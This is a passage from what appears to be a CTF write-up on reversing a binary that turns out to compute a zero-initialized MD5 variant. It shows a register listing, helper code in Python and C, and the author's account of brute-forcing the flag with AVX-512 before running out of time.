A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[39]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[40]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[41]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[42]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[43]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[44]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[45]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[46]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[47]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[48]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[49]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[50]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[51]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[52]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[53]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[54]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[55]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[56]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[57]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[58]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[59]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[60]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[61]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[62]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[63]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[64]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[65]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[66]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[67]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[68]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[69]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[70]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[71]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[72]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[73]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[125] + A[0]
A[0] = A[5] | A[8]
A[5] = A[126] + A[1]
A[1] = A[5] | A[8]
A[5] = A[127] + A[2]
A[2] = A[5] | A[8]
A[5] = A[128] + A[3]
A[3] = A[5] | A[8]</code>
</pre></div>
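
<p>To sanity-check a listing like this, it helps to be able to execute it. The following is a minimal sketch of an evaluator for the three statement shapes that appear above (constant load, binary operation, and <code class="language-plaintext highlighter-rouge">rotl()</code> of a binary operation). It is not the script used during the CTF: the names <code class="language-plaintext highlighter-rouge">run</code>, <code class="language-plaintext highlighter-rouge">OPS</code> and <code class="language-plaintext highlighter-rouge">MASK</code> are made up for illustration, and it assumes that every register is a 32-bit word and that a register which is never assigned reads as 0.</p>

```python
import re

MASK = 0xFFFFFFFF  # assumption: every A[i] is a 32-bit word


def rotl(x, n):
    """Rotate the 32-bit word x left by n bits."""
    n &= 31
    return ((x << n) | (x >> (32 - n))) & MASK


# Binary operators that appear in the simplified listing.
OPS = {
    '|': lambda a, b: a | b,
    '&': lambda a, b: a & b,
    '^': lambda a, b: a ^ b,
    '+': lambda a, b: (a + b) & MASK,  # addition wraps at 32 bits
}

# One pattern per statement shape.
CONST = re.compile(r'A\[(\d+)\] = (0x[0-9a-f]+)$')
BINOP = re.compile(r'A\[(\d+)\] = A\[(\d+)\] (\S) A\[(\d+)\]$')
ROTL = re.compile(r'A\[(\d+)\] = rotl\(A\[(\d+)\] (\S) A\[(\d+)\], (\d+)\)$')


def run(lines, initial=None):
    """Execute the statements in order and return the final register map."""
    regs = dict(initial or {})
    for line in lines:
        line = line.strip()
        m = CONST.match(line)
        if m:
            regs[int(m.group(1))] = int(m.group(2), 16)
            continue
        m = BINOP.match(line)
        if m:
            a = regs.get(int(m.group(2)), 0)  # unassigned registers read as 0
            b = regs.get(int(m.group(4)), 0)
            regs[int(m.group(1))] = OPS[m.group(3)](a, b)
            continue
        m = ROTL.match(line)
        if m:
            a = regs.get(int(m.group(2)), 0)
            b = regs.get(int(m.group(4)), 0)
            regs[int(m.group(1))] = rotl(OPS[m.group(3)](a, b), int(m.group(5)))
            continue
        raise ValueError('unrecognised statement: ' + line)
    return regs
```

<p>In the listing above, <code class="language-plaintext highlighter-rouge">A[8]</code> is never assigned, so under the zero-default assumption every <code class="language-plaintext highlighter-rouge">x | A[8]</code> is just a copy of <code class="language-plaintext highlighter-rouge">x</code>. Likewise, <code class="language-plaintext highlighter-rouge">A[74]</code> through <code class="language-plaintext highlighter-rouge">A[89]</code> are only ever read, so they would be supplied through the <code class="language-plaintext highlighter-rouge">initial</code> argument.</p>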

<h3 id="failing-with-z3">Failing with z3</h3>

<p>The last thing to do now was to pass everything into z3, and <em>boom</em> get the flag… right? Well,
it turned out not to be that simple. I had z3 running for half an hour with still no output, so what
was going on?</p>

<p>I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed
something: a reference to <code class="language-plaintext highlighter-rouge">__ctype_b_loc()</code> in the code. <code class="language-plaintext highlighter-rouge">__ctype_b_loc()</code> is a libc function that
is used in the implementations of certain C functions like <code class="language-plaintext highlighter-rouge">isalpha()</code> and <code class="language-plaintext highlighter-rouge">isdigit()</code>. More
specifically, it returns a pointer to a table of <code class="language-plaintext highlighter-rouge">const unsigned short int</code> values (called <code class="language-plaintext highlighter-rouge">ctype_b_values</code> here), indexed by character code, where each entry contains a
16-bit bitmask in which the <code class="language-plaintext highlighter-rouge">n</code>th bit encodes the return value of one of the <code class="language-plaintext highlighter-rouge">is*****()</code> functions.</p>

<p>Where is this used, you may ask? After the long stream of <code class="language-plaintext highlighter-rouge">if</code> statements, the program iterates
through each byte of the flag (inside <code class="language-plaintext highlighter-rouge">corctf{...}</code>), and terminates the loop early if
<code class="language-plaintext highlighter-rouge">(ctype_b_values[flag[i]] &amp; 8) == 0</code>. The mask <code class="language-plaintext highlighter-rouge">8</code> (bit 3) is glibc’s <code class="language-plaintext highlighter-rouge">isalnum()</code> bit on little-endian machines, and a set bit means
that the byte is alphanumeric. Therefore, the flag has to be <strong>alphanumeric</strong>.</p>
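<p>As a rough illustration of that check, here is a minimal C sketch. The helper names <code class="language-plaintext highlighter-rouge">body_is_alnum</code> and <code class="language-plaintext highlighter-rouge">count_alnum_bytes</code> are made up for this example and are not taken from the challenge binary. The <code class="language-plaintext highlighter-rouge">__ctype_b_loc()</code> branch assumes glibc; on any other C library the sketch falls back to plain <code class="language-plaintext highlighter-rouge">isalnum()</code>.</p>

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Returns 1 if every byte of body passes the alphanumeric check, else 0. */
int body_is_alnum(const unsigned char *body, size_t len) {
    assert(body != NULL);
    for (size_t i = 0; i < len; i++) {
#ifdef __GLIBC__
        /* glibc only: look the byte up in the table that backs isalnum(). */
        if (((*__ctype_b_loc())[body[i]] & _ISalnum) == 0) return 0;
#else
        /* Assumption: other C libraries expose the same answer via isalnum(). */
        if (!isalnum(body[i])) return 0;
#endif
    }
    return 1;
}

/* Counts how many of the 256 possible byte values pass the check. */
int count_alnum_bytes(void) {
    int n = 0;
    for (int c = 0; c < 256; c++) {
        unsigned char b = (unsigned char)c;
        n += body_is_alnum(&b, 1);
    }
    return n;
}
```

<p>In the default C locale, <code class="language-plaintext highlighter-rouge">count_alnum_bytes()</code> should come out to 62 (26 lowercase letters, 26 uppercase letters and 10 digits).</p>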

<p>I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to
find that it <em>still</em> would not budge.</p>

<p>However, this did give me some useful new information: the brute-force search space is not
<code class="language-plaintext highlighter-rouge">69,833,729,609,375</code>, but <code class="language-plaintext highlighter-rouge">50*62^6 = 2,840,011,779,200</code>. That’s nearly a 25x improvement, but still
no easy task. Even if each of the 865 instructions I would have to execute took only one clock
cycle, it would still take <code class="language-plaintext highlighter-rouge">2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours</code> on a typical 2
GHz computer.</p>
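<p>The arithmetic above can be double-checked with a few lines of C. This is only a sketch: the function names are invented for the example, the factor of 50 is taken from the text as-is, and the one-cycle-per-instruction figure is the same optimistic assumption made above.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Integer power by repeated multiplication; the caller keeps the result within 64 bits. */
uint64_t ipow_u64(uint64_t base, unsigned exp) {
    uint64_t r = 1;
    while (exp--) r *= base;
    return r;
}

/* Number of candidates quoted in the text: 50 * 62^6. */
uint64_t candidate_count(void) {
    return 50 * ipow_u64(62, 6);
}

/* Hours to run `instr` one-cycle instructions per candidate on one core at `hz` cycles per second. */
double hours_single_core(uint64_t candidates, uint64_t instr, double hz) {
    assert(hz > 0.0);
    return (double)candidates * (double)instr / hz / 3600.0;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">hours_single_core(candidate_count(), 865, 2e9)</code> gives a little over 341 hours, in line with the estimate.</p>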

<p>At this point we had 14 hours left in the CTF, and it was 3 AM, so I wanted to go to sleep. As
one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to
see if anything would pop up.</p>

<p>I wasn’t expecting any results, until I started seeing <a href="https://en.wikipedia.org/wiki/MD5">MD5</a> pop
up! Could it be that this entire program was implementing MD5? Indeed, after testing the program with
different inputs, it turned out to be MD5, with one difference. Normally, the MD5 state is initialized to
<code class="language-plaintext highlighter-rouge">0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476</code>, but in the program these are all set to zero.
Let’s just call this variant <em>MD5-0</em>.</p>
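<p>To make the difference concrete, here is a compact single-block MD5 in C that takes the initial state as a parameter. It is a sketch written for this explanation, not the code from the challenge: <code class="language-plaintext highlighter-rouge">md5_one_block</code>, <code class="language-plaintext highlighter-rouge">MD5_IV</code> and <code class="language-plaintext highlighter-rouge">MD5_ZERO_IV</code> are hypothetical names, and it only handles messages shorter than 56 bytes, which is enough for a short flag.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Per-step rotation amounts and additive constants from RFC 1321. */
const uint8_t S[64] = {
    7,12,17,22, 7,12,17,22, 7,12,17,22, 7,12,17,22,
    5, 9,14,20, 5, 9,14,20, 5, 9,14,20, 5, 9,14,20,
    4,11,16,23, 4,11,16,23, 4,11,16,23, 4,11,16,23,
    6,10,15,21, 6,10,15,21, 6,10,15,21, 6,10,15,21 };
const uint32_t K[64] = {
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 };

const uint32_t MD5_IV[4]      = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 }; /* standard MD5 */
const uint32_t MD5_ZERO_IV[4] = { 0, 0, 0, 0 };                                     /* "MD5-0"      */

uint32_t rotl32(uint32_t x, unsigned r) { return (x << r) | (x >> (32 - r)); }

/* Hashes a message of fewer than 56 bytes (a single MD5 block) starting from state iv. */
void md5_one_block(const uint8_t *msg, size_t len, const uint32_t iv[4], uint8_t out[16]) {
    assert(len < 56);
    uint8_t block[64] = {0};
    memcpy(block, msg, len);
    block[len] = 0x80;                                   /* padding marker */
    uint64_t bits = (uint64_t)len * 8;                   /* length in bits, little-endian */
    for (int i = 0; i < 8; i++) block[56 + i] = (uint8_t)(bits >> (8 * i));

    uint32_t m[16];
    for (int i = 0; i < 16; i++)
        m[i] = (uint32_t)block[4*i] | (uint32_t)block[4*i+1] << 8 |
               (uint32_t)block[4*i+2] << 16 | (uint32_t)block[4*i+3] << 24;

    uint32_t a = iv[0], b = iv[1], c = iv[2], d = iv[3];
    for (int i = 0; i < 64; i++) {
        uint32_t f;
        int g;
        if (i < 16)      { f = (b & c) | (~b & d); g = i; }
        else if (i < 32) { f = (d & b) | (~d & c); g = (5 * i + 1) % 16; }
        else if (i < 48) { f = b ^ c ^ d;          g = (3 * i + 5) % 16; }
        else             { f = c ^ (b | ~d);       g = (7 * i) % 16; }
        uint32_t tmp = d;
        d = c;
        c = b;
        b = b + rotl32(a + f + K[i] + m[g], S[i]);
        a = tmp;
    }
    /* Add the initial state back in and serialize little-endian. */
    uint32_t h[4] = { iv[0] + a, iv[1] + b, iv[2] + c, iv[3] + d };
    for (int i = 0; i < 16; i++) out[i] = (uint8_t)(h[i / 4] >> (8 * (i % 4)));
}
```

<p>Passing <code class="language-plaintext highlighter-rouge">MD5_IV</code> reproduces ordinary MD5, while passing <code class="language-plaintext highlighter-rouge">MD5_ZERO_IV</code> gives the zero-initialized variant described above. Keeping the initial state as a parameter makes it easy to sanity-check the sketch against known MD5 digests before trusting the variant.</p>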

<p>In any case, I went to sleep with this knowledge hoping to crack this the next day.</p>

<h3 id="the-next-day">The next day</h3>

<p>(I woke up <del>bright and early</del> at 11AM the next morning)</p>

<p>Since no practical
<a href="https://crypto.stackexchange.com/a/41865">preimage attack</a> on MD5 is known, the only option was to
brute force <em>MD5-0</em> over <code class="language-plaintext highlighter-rouge">2,840,011,779,200</code> possibilities, where the correct flag should produce a
suffix of <code class="language-plaintext highlighter-rouge">19c603ba14353ce4</code>.</p>

<p>To test the feasibility of the brute force, I grabbed an online C
implementation of <a href="https://github.com/robertaboukhalil/md5/blob/master/md5.c">MD5</a> and measured its
speed. The baseline single-threaded performance on my machine reached around <code class="language-plaintext highlighter-rouge">8*10^6</code> hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would still be a
daunting <code class="language-plaintext highlighter-rouge">2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours</code>.</p>

<p>Even after optimizing the program by using the fact that the flag was always 11 bytes long and
unrolling all of the loops, I was only able to reach <code class="language-plaintext highlighter-rouge">1.3*10^7</code> hashes per second, or
<code class="language-plaintext highlighter-rouge">15 hours</code>. Still not nearly fast enough!</p>
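<p>Both running-time figures follow from the same formula, sketched below in C. The function name is made up for this example, and the formula assumes that throughput scales perfectly with the number of cores, which is the same simplification used in the estimates above.</p>

```c
#include <assert.h>

/* Hours needed to test `candidates` inputs at `rate` hashes per second per core. */
double brute_force_hours(double candidates, double rate, int cores) {
    assert(rate > 0.0 && cores > 0);
    return candidates / rate / cores / 3600.0;
}
```

<p>With <code class="language-plaintext highlighter-rouge">2840011779200.0</code> candidates on 4 cores, a rate of <code class="language-plaintext highlighter-rouge">8e6</code> lands just under 25 hours and a rate of <code class="language-plaintext highlighter-rouge">1.3e7</code> lands just over 15 hours.</p>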

<h3 id="vectorization-is-op">Vectorization is OP</h3>

<p>A common “cheat” to magically increase a program’s speed is to use x86 SIMD instructions to perform
vectorized operations on more than 64 bits at a time. Luckily, my computer supported <code class="language-plaintext highlighter-rouge">AVX-512</code>, an
instruction set that allows performing 16 32-bit operations in parallel.</p>

<p>I wrote a new MD5 implementation from scratch using these instructions, called <code class="language-plaintext highlighter-rouge">md5_avx512</code>, which
could hash 16 11-byte strings at once. I was expecting maybe a 4-8x speedup, but it ended up being able to
compute hashes 16x faster, which is the theoretical optimum! This brought the estimated time to
just under an hour, which might just be fast enough.</p>
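<p>To show what “16 hashes at once” means without requiring AVX-512 hardware, here is a portable scalar model of one MD5 step across 16 lanes. It is only a sketch: <code class="language-plaintext highlighter-rouge">vec16</code>, <code class="language-plaintext highlighter-rouge">ternlog32</code> and <code class="language-plaintext highlighter-rouge">step16</code> are names invented for this example. <code class="language-plaintext highlighter-rouge">ternlog32</code> models the truth-table lookup performed by <code class="language-plaintext highlighter-rouge">_mm512_ternarylogic_epi32</code>, and a compiler may or may not turn the lane loop into real vector instructions.</p>

```c
#include <assert.h>
#include <stdint.h>

#define LANES 16  /* one 512-bit register holds 16 x 32-bit words */

typedef struct { uint32_t w[LANES]; } vec16;

/* Scalar model of a three-input bitwise operation selected by an 8-bit truth table:
   each result bit is the imm8 bit at index (a_bit << 2 | b_bit << 1 | c_bit). */
uint32_t ternlog32(uint32_t a, uint32_t b, uint32_t c, uint8_t imm8) {
    uint32_t r = 0;
    for (int bit = 0; bit < 32; bit++) {
        unsigned idx = ((a >> bit) & 1) << 2 | ((b >> bit) & 1) << 1 | ((c >> bit) & 1);
        r |= (uint32_t)((imm8 >> idx) & 1) << bit;
    }
    return r;
}

uint32_t rotl32(uint32_t x, unsigned r) {
    assert(r > 0 && r < 32);
    return (x << r) | (x >> (32 - r));
}

/* One MD5 step applied to every lane: a = b + rotl(a + f(b, c, d) + k, r).
   Each lane carries the state of a different candidate string. */
void step16(vec16 *a, const vec16 *b, const vec16 *c, const vec16 *d,
            uint8_t f, unsigned r, const vec16 *k) {
    for (int i = 0; i < LANES; i++) {
        uint32_t t = a->w[i] + ternlog32(b->w[i], c->w[i], d->w[i], f) + k->w[i];
        a->w[i] = rotl32(t, r) + b->w[i];
    }
}
```

<p>With this convention, the truth table <code class="language-plaintext highlighter-rouge">0xca</code> selects <code class="language-plaintext highlighter-rouge">(b &amp; c) | (~b &amp; d)</code>, <code class="language-plaintext highlighter-rouge">0xe4</code> selects <code class="language-plaintext highlighter-rouge">(b &amp; d) | (c &amp; ~d)</code>, <code class="language-plaintext highlighter-rouge">0x96</code> is a three-way XOR and <code class="language-plaintext highlighter-rouge">0x39</code> is <code class="language-plaintext highlighter-rouge">c ^ (b | ~d)</code>, which are the four MD5 round functions.</p>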

<p>By the time I finished writing the program, we only had one hour left on the clock. Regardless, I
ran the program and waited for a miracle. Unfortunately, it took longer than expected: it was only
halfway done with 10 minutes left on the clock. I held out for a clutch victory, but
it did not come.</p>

<h3 id="two-stupid-bugs">Two stupid bugs</h3>

<p>After the CTF concluded I kept my program running, but it actually finished without finding any
solution! To my (annoyed) disbelief, I had introduced two stupid bugs. One was using the
flipped endianness for the target suffix, and the other was applying <code class="language-plaintext highlighter-rouge">#pragma omp parallel for</code>
without realizing that the threads were overwriting each other’s variables!</p>
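<p>The endianness bug is easy to reproduce. MD5 serializes its 32-bit state words in little-endian order, so the hex suffix has to be read back the same way before comparing it with the state. A small sketch, with helper names that are made up for this example:</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads 4 bytes as a little-endian 32-bit word, the order MD5 uses for its output. */
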